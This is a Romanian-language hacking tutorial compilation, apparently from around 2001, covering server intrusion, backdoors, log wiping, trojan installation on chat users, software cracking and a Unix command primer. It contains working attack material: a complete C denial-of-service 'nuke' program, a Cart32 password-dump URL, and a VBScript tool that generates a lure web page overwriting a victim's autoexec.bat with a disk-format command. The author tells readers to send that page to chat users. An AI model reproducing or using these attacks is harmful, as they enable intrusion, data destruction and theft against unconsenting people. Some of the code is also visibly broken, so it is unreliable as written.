Sunteți pe pagina 1din 15

Autor:nebunu

Data:7-02-2001
Subiect:Metode clasice de atac asupra oricarui server

Strangerea de informatii este vitala pentru a putea obtine acces pe un server.


Voi da in continuare 10 metode de adunare a informatiilor despre server.com.
1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este sa tastati:
c:/>windows>tracert -j server.com
Acum este necesar sa vedem daca are optiunea "file and print share enabled",si
daca sistemul de operare este linux sau windows nt.
c:/>windows>nbtstat -A ipadress
unde ipadress este adresa de IP gasita la pasul anterior.Comanda va lista
numele tuturor userilor din memoria cache daca serverul este prost configurat.
2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger
precum si vesiunea lor.c:/>windows>ftp server.com
Daca are serviciu ftp va aparea ceva de genul "connected to server running
WUFTPD...".Am aflat versiunea de server ftp care ruleaza pe portul 23.
Deschidem browserul de web si introducem http://www.server.com/lalalalala.htm.
Vom primi un raspuns de genul "file not found on this server.Server running
apache.."Am aflat si versiunea serverului pe care sunt stocate paginile web.
La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25
La fel vom primi un mesaj asemanator.
Cunoscand toate serviciile care ruleaza pe server si versiunea acestora
putem foarte usor gasi un exploit pentru ele.
3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts.
Cel mai bun program care face acest lucru este Cgifound.Spre exemplu un
fraier mi-a trimis deunazi un link catre un server vulnerabil si anume
www.server.com.Vulnerabilitea consta in programul cart32.exe care se
gaseste in cgi-bin.exploitul este:
www.server.com/cgi-bin/cart32.exe/cart32clientlist
Parola poate fi orice cuvant si toate parolele userilor sunt listate.Este
un bug cunoscut pentru cart32.exe.Pentru a vedea insa versiunea de cart32
introduceti in browser:www.server.com/cgi-bin/cart32.exe
Foarte multe informatii despre vulnerabilitatile acestui program gasiti pe
www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'.
Este relativ usor sa afli parola unui server,asta o poate face orice kiddie script
insa este mai greu sa nu lasi urme.Si mai greu este sa instalezi un backdoor
pe server ca sa poti intra cand doresti.
4)Instalarea unui backdoor pe server se face in functie de sistemul de operare.
Pentru Unix:
Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts.
Dupa ce am patruns inauntru editam fisierul etc/rhosts in felul urmator:
#ed etc/rhosts?somesite.com someuser*w*q
Sau mai simplu daca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts
si sa adaugati linia:somesite.com semeuser
Asta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta
folosind comanda 'rlogin' si userul 'someuser'.Frumos,nu?Pentru NT:
Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe
amanunte gasiti pe packetstorm.securify.com tastand 'NT'.
Evident acest truc este detectabil de administratorul retelei dar temporar
este bun pentru ca va ajuta sa obtineti acces la radacina.Spre exemplu sub NT
luati fisierele *.sam si decriptati-le.Sub Unix rulati un script care confera
drept de root(SuID shell).
Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa
indepartam orice urma a 'vizitei' noastre pentru ca administratorul sa nu
se prinda si sa putem intra oricand.Urmele se sterg indepartand IP-ul nostru din
fisierele '*.log'.Sub Unix fisierul etc/inetd.conf contine toate serviciile
care ruleaza pe server precum si setarile acestora.Ce s-ar intampla daca modificam
temporar aceste setari? :)
5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda sniffingului.
Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe
un anume port indicat de utilizator.Cand cineva vrea sa se conecteze la serverul
de mail pentru a-si citi mesajele parola si userul sunt interceptate si trimise
la persoana care are snifferul in functiune.Un sniffer foarte bun este Buttsniff.
Il gasiti pe www.packetstorm.securify.com.Iata cum functioneaza:
c:/>buttsniff -l 0 fisier.dmp p fisier.foo
Sa analizam putin acesta comanda:fisier.dmp este fisierul care va contine datele
capturate de sniffer.Fisierul fisier.foo contine comenzi sau mai bine zis
instructiuni.Continutul aproximativ al unui fisier.foo:
-----------------------------*.*.*.*122.1.1.4+25----------------------------
Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte
porturi sunt excluse.Un fisier.foo gol inseamna ca vreti sa colectti toate datele
care vin/pleaca de la server.Mai multe instructiuni gasiti in fisierul
readme.txt.
6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack'
Sa explic foarte pe scurt aceasta metoda:
Un server ftp A nu permite acces anonim decat unui server ftp B considerat
de incredere,probabil din aceeasi retea.Serverul ftp B are un cont 'guest'
activat.Se poate patrunde in A prin B folosind un script cu comenzi ftp ase-
manator celui de mai jos:quo "USER annonymous"quo "PASS gogo@lala.com"quo "pasv"
...........Mai multe informatii pe astalavista.
7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta a radacinii,
de obicei serverul este instalat pe o ale virtuala.Serverul www.ipswitch.com
are aceasta vulnerabilitate:www.ipswitch.com/_vti_pvt/shtml
si primim drept raspuns calea exacta si reala a serverului.Acum devine banal:
ftp server.comuser:ftppassword:guest
dir ---sa vedem la ce avem acces,poate avem acces la cgi-bin--
cd --calea aflata inainte--(c:/inet/root...)put program.exequit
8)O alta vulnerabilitate este comanda PUT.Daca serverul este configurat prost:
c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0
--corpul scriptului--/n/n/n
Dupa aceea il executam din browser:www.server.com/script/script_ostil.asp
Portul poate sa nu fie 80 ci 8080 sau 8000 depinde de situatie.Trebuie intai
sa vedem unde ruleaza pagini web.
9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelor
sau a pachetelor de date care "intra in server".O mare companie a fost atacata
in felul acesta cu ajutorul comenzii "SYN".Nu am timp sa dau detalii,poate intr-un alt
tutorial,cititi articolele de pe astalavista,tastati 'tcp'.
10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica
conceptul de dos attack.Ideea este ca daemonul care ruleaza pe un anumit port
nu poate face fata la cereri repetate.Programul este facut in Borland C++.
Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp
-------------------------------------------
#include <conio.h>
#include <stdio.h>
#include <winsock.h>struct
{
int port; char *targetIP;
int NumOfAttact, BufSize;} parm;void Pause(void)
{
cprintf ("Apasati orice tasta pentru a renunta...");
getch();
cprintf ("\r\n");
}
int CheckWinsock()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) return err;
if ( LOBYTE( wsaData.wVersion ) != 1 ||
HIBYTE( wsaData.wVersion ) != 1 )
{ WSACleanup(); return -1;
} return 0;}void ParseIP(char* des, char *theIP){ unsigned int val; char i;
for (i = 0; i < 4; i++) { if (*theIP != '\0') { val = 0;
while (*theIP != '\0' && *theIP != '.') { val *= 10;
val += *theIP - '0'; theIP++; } des[i]= (char)val;
if (*theIP != '\0') theIP++; } }}
void ParseParm(int argc, char* argv[]){ char * value;
for (int i=1; i<argc; i++){ if (argv[i][0]=='/'){
argv[i][1]= (char)toupper(argv[i][1]); value = &argv[i][2];
switch (argv[i][1]){ case 'P': parm.port = atoi(value); break;
case 'T': parm.targetIP=value; break;
case 'N': parm.NumOfAttact = atoi(value); break;
case 'S': parm.BufSize = atoi(value); break; } } }}
int main(int _argc, char* _argv[]){ int i, errcode; char *tempbuf;
SOCKET theSocket; sockaddr theAddr;
cprintf ("folosire : Nuke [/Pport] [/Ttarget] [/Nnum] [/Ssize]\r\n"
" port : portul tinta, folositi 139.\r\n"
" target: adresa iP \"a.b.c.d\".\r\n"
" num: numarul de atacuri, implicit 10.\r\n"
" size: numarul de biti in fiecare atac, implicit 1024.\r\n\n");
if (CheckWinsock()){ cprintf ("nu merge conexiunea!\n");
Pause(); return 1; }
theSocket= socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (theSocket==-1){
cprintf ("nu merge conexiunea!\r\n"); Pause(); WSACleanup(); return 2;
} cprintf ("folosim socket-ul: %d\r\n", theSocket);
parm.port = 139; parm.targetIP= NULL;
parm.NumOfAttact = 10; parm.BufSize = 1024; ParseParm(_argc, _argv);
if (parm.targetIP==NULL){ parm.targetIP = (char*) malloc(256);
cprintf ("Introduceti Ip-ul: "); scanf ("%s", parm.targetIP);
cprintf ("\r\n"); } theAddr.sa_family = AF_INET;
theAddr.sa_data[0]= (char)(parm.port/256);
theAddr.sa_data[1]= (char)(parm.port%6);
ParseIP(&theAddr.sa_data[2], parm.targetIP;
cprintf ("conexiune la %s pe portul: %d\r\n", parm.targetIP, parm.port);
errcode = connect (theSocket, &theAddr, sizeof(sockaddr)); if (errcode){
cprintf ("Eroare.\r\nVerificati daca portul este 'pazit' de un daemon.\r\n");
Pause(); WSACleanup(); return 1; } cprintf ("STATUS: Conectat!!\r\n");
tempbuf = (char*) malloc(parm.BufSize);
for (i=0; i<parm.BufSize; i++) tempbuf[i]=0;
for (i=0; i<parm.NumOfAttact; i++){
errcode = send (theSocket, tempbuf, parm.BufSize, MSG_OOB);
cprintf ("Atac: %d , trimis ", i); if (errcode==-1) cprintf ("eroare.\r\n");
else cprintf ("%d bytes.\r\n", errcode); } free (tempbuf);
closesocket (theSocket); WSACleanup(); cprintf ("gata.\r\n"); Pause();
}

Fratilor!.Computerul nu este o masina de scris.Cine crede acest lucru si este utilizator de


windows 95/98 il rog sa apese acest link apasa aici pentru a fi pedepsit!.
Cum zic eu intotdeauna,sa trecem la treaba!

Toate programele mentionarte le gasiti folsind motorul de cautare in care tastati numele
programului.
Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.
Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver.
Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.
Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar
c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-
ul
persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.
Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii.
(rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.)
Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network"
care se gaseste in "control panel" activata.
Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.
Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu
programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de
comenzi:

c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului}


Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem
ca numele
este nebunu(nu,nu incercati la mine,eu nu intru pe chat-uri -:)
Tastati "c:/windows/net use f:\\IP\nebunu" si aveti acces la discul f al fraierului!.
Sa explicam aceasta comanda:
Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95.
IP-adresa lui de ip.
f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces.
nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP"

Sa instalam acum un troian cum ar fi Subseven pe calculatorul lamerului.


Dupa ce dati comanda "c:/windows/net use f:\\IP\nebunu" copiati fisieul "server.exe" pe f:
"copy server.exe f:" apoi il executati "f:/server.exe".

DISTRACTIE PLACUTA

Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti
crea
un disc virtual x: pe care sa puneti troianul.
"net use x:\\IP\tmp\parola_dorita/user:ntwak0
"net copy server.exe"

C-R-A-C-K-I-N-G ----------------------- N-O-T-E-P-A-D


Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare
mesajul "the file is too large for notepad to open......."????.Haideti sa scapam de acest mesaj
si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.
1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew
2) cunostinte minime de assembler

-dezasamblati programul in w32dasm


-activati optiunea "string reference" si cautati sirul "the file is too large..."
-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul
Import
-cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)
-dati dublu click pe ea si obtineti ceva de genul

call dword ptr [00407430] {chemarea procedurii de mesaj}


cmp eax,0000006{compara registrul eax cu adresa procedurii}
jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt
doua optiuni
la selectarea lui OK se deschide Wordpad iar altfel iese.
Celelalte instructiuni nu mai conteza
- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset
-inchideti w32dasm

-deschideti Hiew "hiew notepad.exe"


-selectati F4 optiunea decode
-F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)}
-F3 scrieti 404840484048
-F9 pentru a valida introducerea
-F5,scrieti numarul pentru jne care este 216A
-F3,scrieti 404840484048
-F9 pentru a actualiza si Gata!!!
Ce dracu' este 404840484048?
40-in hexazecimal inseamna "inc eax" adica adauga 1
48-inseamna "dec eax" adica scade 1
90 inseamna NOP adica instructiunea nula(nu face nimic)
Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune
asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1).

C-R-A-C-K-I-N-G W-I-N-Z-I-P

-deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669


-NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie
-scanez in programul dezasamblat 66696669 in hexa
-ma duc la adresa indicata cum ar fi 00154:FA14569
-gasesc ceva de genul:
mov al,[edx]
cmp al,[esi]
jnz 00418956

Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in
memorie
in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!
DATA VIITOARE UN NOU TUTORIAL DE HACK
Ne vom ocupa in acest tutorial de conturile dial-up.
Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com
Continut:

1)Strangerea de informatii(partea cea mai grea de fapt)


2)Atacul propriu zis.
3)contul dial-up in registrii windows-ului

1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare


vulnerabilitate,aceea de a asigna numele utilizatorului folosit pentru conexiunea la
internet,unei adrese de mail.Spre exemplu ISP-ul meu este
firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "nebunu".Atunci
adresa mea de mail este nebunu@ISP.ro sau nebunu@server.ISP.ro.Deci daca aflu parola de
la mail aflu si parola folosita pentru dial-up.
Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul
110 deschis.iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne
intereseaza portul 110.Dar cum aflam care este
adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de
internet,tastand:

tracert -j www.ISP.ro

Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a
mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in
cazul nostru pentru portul 110.Dar nu
strica sa stim daca are si portul 79 deschis....;).

fscan -vbp 79,110 154.14.14.1-254

Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar


este serverul cautat,lansam din Start/Run urmatoarea comanda:

telnet 154.14.14.144 110

Dupa ce ne conectam tastam

user blahbla

si vom primi ceva de genul +OK apoi tastam

pass blabla

si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!.


Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa:

telnet server_de primire 110


user userul_tau
pass parola_ta

si iti poti citi mail-ul folosind telnetul.

2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta
folosim un program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul
de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge
cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt
dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am
intalnit cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea
"finger" a programului mIRC.
Posibilitatile sunt nesfarsite,incercati...:).

3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre
conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune
se afla la

H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii"

Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand
un tutorial despre asta.
Din pacate acolo unde exista intelepti exista si nebuni,oameni care fac rau numai din
placerea de a face,fara nici un interes material sau de alta natura.Categoria mentionata este
mare,eu o sa mentionez numai un exemplu,un incident nefericit.Putin inainte de a scrie
acest articol,mai precis cu o zi inainte,am folosit motorul de cautare de la www.top100.ro
pentru a descarca un program.Dupa aspectul dubios al site-ului mi-am dat seama imediat ca
am de-a face cu un virus,dar mi-am pus nadejdea in masurile de securitate excelente pe
care le am impotriva oricarui tip de atac.Asa ca am descarcat programul si l-am
rulat.Antivirusul nu a dat nici un semn de viata.Mi-am contnuat lucrul mai
departe.Nimic.Poate m-am inselat,mi-am zis.Am inchis computerul si m-am culcat.A doua zi
i-am dat drumul.Dezastru.Ecran negru.Hardul putea sa faca concurenta celui mai nenorocit
tractor african.Am intrat pe Safe Mode.Acelasi lucru.Am intrat in binecuvantatul sistem de
operare MSDOS,pe care nu il voi mai critica niciodata.Am vrut sa vad continutul fisierelor
"win.ini","system.ini","autoexec.bat".Am gasit ceea ce cautam.In fisierul "system.ini" la linia
"shell" era ceva de genul:

shell=Explorer.exe gkgflllgg.exe

Am sters toata linia pana la semnul egal.Am cautat programul gkgfllgg.exe si l-am sters.Nici
un rezultat.Dupa doua ore de investigatii si dupa ce mi-am epuizat toata gama de injuraturi
am izolat toate fisierele infectate si le-am sters.Nimic.Nu puteam sa intru in Windows deci nu
aveam acces la registrii.Am reinstalat Windowsul dar am pierdut 100MB de pe hard plus
niste informatii pe care nu doream sa le pierd.De aceea vreau sa va dau cateva sfaturi foarte
utile privind propria securitate pe Net.

1)Nu va incredeti in nici un antivirus indiferent de upgrade,zilnic apar peste 12000 virusi din
ce in ce mai "duri'.

2)Nu descarcati nici un program de carding,hack,nuke,dial-up de pe site-urile romanesti


prezente in top100.Nici nu merita sa vizionati acele site-uri care va promit orice fara nici un
efort.Daca totusi o faceti,inspectati cu atentie site-ul.Daca nu mai contine link-uri la alte
pagini,adrese de mail sau explicatii plauzibile,daca conditioneaza vizionarea lor de votul dvs
in top100 plecati imediat.

3)Cei care promoveaza site-uri ilegale,pornografice,in care se gasesc numere de carti de


credit si alte dracii ,si va ofera programe cu pretentia ca puteti rezolva orice problema cu ele
se inseala iar dvs sunteti cei pacaliti.

4)Programele care pretind ca listeaza toate conturile celor conectati la internet numai
introducand IP-ul serverului sunt virusi sau troieni.Exemple de astfel de programe
virusate,incarate de mine din simpla curiozitate pentrua vedea pana unde merge magaria,
prostia si lipsa de judecata a unora sunt:Iris.exe,dial_up_sniffer.exe,infiltrator.exe.Aceste
programe sunt gazduite de siteuri formate dintr-o singura pagina si care au foarte multe
voturi in top100.Singura pagina in care am incredere prezenta in top100 se afla la
www.ender2000.home.ro

Studiind comportamentul acestui virus,cat si a altora am ajuns la concluzia ca majoritatea


acestor programe odata rulate creeaza din corpul lor alte fisiere in directorul Windows sau
System iar apoi creeaza intrari in registrii.De aceea se impune o monitorizare atenta a
modificarilor continutului unui director.Dupa acest incident m-am hotarat sa creez un astfel
de program de monitorizare care sa ruleze atat sub Windows cat si sub Dos.Sper sa fie gata
pana pe 14 ianuarie 2000 si sa fie pus la dispozitia dumneavoastra cu tot cu cod sursa.

Cand rulati un program si apare o caseta de dialog de genul "cannot find blabla.dll" sunt
90% sanse sa fie virus.Nu iesiti din windows,stergeti linia "shell" din "system.ini",sa ramana
ceva de genul "shell=Explorer.exe",stregeti toata linia "run" din fisierul "win.ini",sa ramana
numai "run=",afisati continutul fisierului "autoexec.bat" si inspectati continutul apoi vedeti
calea "c:/windows/start menu/programs/startup" si stregeti tot ce va pare suspect,adica ce
nu ati avut inainte.Apoi tastati "regedit" si stregeti CLSID-urile suspecte,o sa scriu un tutorial
despre registrii cat de curand.

Un hacker adevarat nu distruge nimic atunci cand reuseste sa patrunda intr-o retea ci
foloseste in interes propriu toate informatiile sustrase.Am intalnit lameri nenorociti care
formateaza hardul computerului in care reusec sa patrunda cu ajutorul programului Legion
sau a altor programe de acest gen.Asta denota lipsa de materie canusie,nu-si imagineaza ca
pot sa tina computerul respectiv sub control timp indelungat si sa sustraga in timp toate
informaiile.

Daca gasiti vreo explicatie pentru care cineva doreste sa distruga ceva fara nici un motiv
trimiteti un email la adresa nebunu@home.ro .

Priviti codul sursa de mai jos.Salvati pagina, copiati codul intr-un fisier cu extensia htm,rulati
pagina,apasati "yes",si vedeti cum se poate citi continutul unui fisier direct din browserul
Web.Evident ca se pot face mult mai multe,se poate schimba continutul unui fisier,se pot
infiltra troieni cu ajutorul comenzilor vbscript.

-----------------------------------------------incepe codul----------------------------------------------------------

<html><head><title>titlu</title></head><body bgcolor="black">
<script language="javascript">

stats='toolbar=no,location=no,directories=no,status=no,menubar=no,maximize= no'
stats+='scrollbars=no,resizable=no,width=335,height=80,top=190,left=227'
MsgBox = window.open ("","msgWindow",stats)
MsgBox.document.write("<title>Press YES to see the live demo! </title>")
MsgBox.document.write ("<BODY bgColor='#c0c0c0'>")
MsgBox.document.write ("<font color='black' size=5>Are you sure you want to see the
demo?</font>")

</SCRIPT>

<script language="vbscript">
dim f,a
set fso=createobject("scripting.filesystemobject")
set f=fso.opentextfile("c:\autoexec.bat")
a=f.readall
msgbox a
</script>
</body></html>

---------------------------------sfarsit----------------------------------------

Secventa:

set fso=CreateObject("scripting.filesystemobject")
set fisier=CreateTextfile("c:\fisier.txt")
fisier.writeline "o linie scrisa in fisier"
fisier.close

creeaza un fisier text in care apare textul "o linie scrisa in fisier".Acesta este principiul
infiltrarii troienilor.Restul invatati singuri.

Email nebunu@home.ro

Programul AntiLame.vbs a fost creat de mine special ca o metoda de lupta impotriva


chaturilor si a lamerilor de acolo.Programul creeaza o pagina web care contine un fisier de
comenzi asemanatoare celor din autoexec.bat.Odata rulata,acesta pagina,afiseaza o caseta
de dialog cu un mesaj atragator destinat sa acopere mesajul implicit de avertizare a
pericolului.Daca utilizatorul apasa "No" scriptul nu are efect,dar majoritatea lamerilor vor
apasa "Yes" :).Acum voi da cateva detalii despre metoda de utilizare a programului.

1)creati un fisier text care sa contina comenzi Dos.Iata un exemplu:

@echo off
PATH c:/windows;c:/windows/command;
format c:/q/autotest/u

2)Presupunand ca fisierul anterior se numeste fisier.txt,introduceti calea catre el cand


programul cere acest lucru.Spre exemplu daca fisierul se afla in directorul "my
documents",introduceti calea urmatoare c:/my documents/fisier.txt

3)Programul va crea pagina cu extensia *.htm.Pentru a vedea daca este compatibila cu


browserul dvs rulati-o iar la mesajul "are you sure you want to see......." apasati "No" pentru
a opri scriptul.Daca cumva apasati "Yes" autoexec.bat-ul dvs se schimba si trebuie sa-l
stergeti.Dar voi apasati "No" pentru a nu avea probleme.

4)Arhivati pagina in format *.zip si trimiteti-o lamerului prin e-mail.Trebuie neaparat sa


arhivati pagina pentru ca online pagina nu va rula.

Programul a fost scris in vbscript pentru a putea vedea sursa acestuia si exemplifica
conceptul infiltrarii troienilor cu ajutorul paginilor web.Dezavantajul este ca programul
AntiLame ruleaza numai sub Windows95/98.

Programul poate fi luat de aici impreuna cu fisierul info.dat.Cele doua fisiere trebuie sa fie in
acelasi director altfel programul nu va rula.Daca programul v-i se pare interesant poate
votati pentru mine in top100.:)
Astept cu nerabdare comentariile dvs la nebunu@home.ro .Sfatul meu este sa trimiteti
pagina creata prin DCC lamerilor de pe chat-uri.Nu uitati sa fie arhivata!!!

dim fisier,linie,fisier2,troian,a,fisier3,g
mesaj = "Acest script va crea o pagina web care modifica autoexec.bat-ul lamerului"
titlu = "Vizitati www.nebunu.home.ro Email:nebunu@home.ro"
Call nebunu()
set fso=createobject("scripting.filesystemobject")
if fso.fileexists("info.dat")<>true then
msgbox "Fisierul info.dat nu exista! Reinstalati-l in director.",0,"Nebunu"
wscript.quit
end if
a=inputbox("Dati calea catre fisierul de comenzi pe care doriti sa-l introduceti in
autoexec.bat-ul lamerului.Fisierul trebuie sa fie in format text si nu trebuie sa fie mai mare
de 64K! :")
if (a="") then
wscript.quit
end if
set fisier=fso.Opentextfile(a)
set fisier2=fso.createtextfile("c:\my documents\oferta.htm")
set fisier3=fso.opentextfile("info.dat")
g=fisier3.readline
fisier2.write "<html><head><title>Animation program</title></head><body
bgcolor='black'>"
fisier2.writeline "<script language="&g&"javascript"&g&">"
fisier2.writeline"stats='toolbar=no,location=no,directories=no,status=no,menubar=no,maxi
mize=no'"<BR>fisier2.writeline"stats+='scrollbars=no,resizable=no,width=335,height=80,t
op=190,left=227'"
fisier2.writeline "MsgBox = window.open ("&g&""&g&","&g&"msgWindow"&g&",stats)"
fisier2.writeline "MsgBox.document.write("&g&"<title>Press YES to download free porn
movies !</title>"&g&")"
fisier2.writeline "MsgBox.document.write ("&g&"<BODY bgColor='#c0c0c0'>"&g&")"
fisier2.writeline "MsgBox.document.write ("&g&"<font color='black' size=5>Are you sure
you want to see the sexyest girls from the whole planet?</font>"&g&")"
fisier2.writeline "</SCRIPT>"
fisier2.writeline "<script language="&g&"vbscript"&g&">"
fisier2.writeline "set fso=createobject("&g&"scripting.filesystemobject"&g&")"
fisier2.writeline "set f=fso.createtextfile("&g&"c:/autoexec.bat"&g&")"
do while fisier.atendofstream<>true
linie=fisier.readline
troian="f.writeline "&g&"" &linie&""&g&" "
fisier2.writeline troian
loop
fisier2.writeline "f.close"
fisier2.writeline "</script>"
fisier2.writeline "</body></html>"
fisier.close
fisier2.close
fisier3.close
msgbox "Pagina a fost creata.Stiti ce aveti de facut cu ea :)",0,"Nebunu"
Sub nebunu()
Dim buton

buton = MsgBox(mesaj, _
vbOKCancel + vbInformation, _
titlu )
If buton = vbCancel Then
WScript.Quit
End If
End Sub

1)comenzi unix
2)fisiere speciale
3)suid shell
4)fisiere script

Prima oara cand am pus mana pe o carte despre UNIX mi-am zis ca nu o sa fiu
capabil niciodata sa invat acest sistem de operare deoarece este prea dificil.
In realitate este extraordinar de simplu si usor de utilizat oarecum asemanator
cu MSDos-ul.Aceasta impresie de moment mi-a fost creata de stilul in care a fost
scrisa cartea,un stil greoi cu multe explicatii suplimentare care in loc sa
te faca sa intelegi,mai rau te incurca,stil specific autorilor cu pretentii
de geniu,si cu mintea creatza datorita propriilor aberatii.
Eu o sa intru direct in subiect si o sa prezint comenzile principale.Evident
ca sa le puteti folosi trebuie sa aveti un cont la nethet.net.V-am explicat deja
cum poate fi obtinut,nu mai insist.(cititi capitolul telnet).Semnul $ reprezinta
promptul dvs la nether.net cum ar fi /> in Dos.

Principalele comenzi unix:

cat

listeza continutul unui fisier pe ecran.


cat fisier

ls
listeaza continutul unui director(toate fisierele)
ls-
acelasi lucru,numai cal isteaza si drepturile de acces.

cp
copiaza continutul unui fisier in alt fisier
cp fisier1 fisier2

ed
editeaza un fisier
ed fisier
?
a "de la append"
prima linie
a doua linie
{control z}
?
w
?
q

dupa ce dati comanda "ed fisier" apare semnul ?,tastati a de la append


scrieti fisierul propriuzis,tastati control+z,iar va aparea ?
tastati "w" ca sa acordati drept de scriere,apoi "q" de la quit.

cd
schimba directorul curent
cd /etc
directorul curent va fi etc.
cd /
diretorul curent va fi directorul radacina.

pwd
rezultatul este directorul curent
pwd
/usr/bin

finger,rwho,who
ofera informatii despre domeniul respectiv sau despre userul respectiv
finger nebunu@home.ro
login name:nebunu
.........
finger home.ro
name:home.ro in real life??
connection refused
asta inseamna ca unele severe nu permit acest lucru si bine fac :)

mail
trimite un mesaj la adresa specificata
mail nebunu@home.ro
Salut,te-am votat in top 100
{control+c}

whereis
listeaza calea catre un anumit program sau fisier
whereis ping

chmod
shimba starea fisierului
chmod r+w fisier
fisierul acorda drept de citire si scriere
chmod +x fisier
fisierul poate fi executat

exit
termina aplicatia pe serverul gazda.

Nu a fost chiar asa de complicat ,nu?

2)Cel mai important fisier pentru hackeri este /etc/passwd fisierul cu parola.
Am mai vorbit despre el asa ca nu mai insist.
De obicei utilizatorii obisnuiti nu au acces la el,dar la nether.net am gasit
o vulnerabilitate.Cu toate ca parolele nu pot fi decriptate deoarece sunt "shadow"
pot afla toti userii de pe server,in total vreo 10000!Cati dintre ei au aceiasi
parola ca si username?Foarte multi dar nu ma intereseaza......
cat etc/passwd

va aparea pe ecran o lista care se va derula cateva minute!


Stiti deja cum sa cititi un fisier passwd,si stiti cum pot fi aflati userii.

Alt fisier important este etc/services care contine serviciile care ruleaza pe server.

Mai poate fi mentionat directorul conf si fisierul etc/inetd.conf care contin


setarile de baza.
Gata cu aceasta parte..Puteti invata restul si singuri.

3)
Un shell este un program care se incarca in momentul conectarii iar apoi se
executa.Sa luam secventa:

c:/>windows>telnet nether.net 23
..tastati dublu enter...
..apar informatii despre server...
login:username-ul dvs
password:parola dvs
bash $

In acest moment shell-ul este activ(bash).Semnul "$" inseamna ca nu detineti


drept de acces la root.Daca ati avea acest drept promptul ar fi "#"
Scopul unui hacker este root access.Cum poate fi obtinut?Faceti shell-ul dvs
sa joace rolul de root!In acest moment aveti controlul total asupra serverului.
Puteti edita fisierul etc/passwd adaugand inca o intrare,cu care puteti intra,
puteti schimba parola...:).Acest lucru poate fi obtinut ruland pe server un
program SUID.Informatii despre suid aflati de pe astalavista.box.sk, eu nu am
timp sa scriu astfel de programe,oricum ele pot fi gasite peste tot.

4)Fisierele script in unix seamana cu fisierele *.bat din dos.Un mic


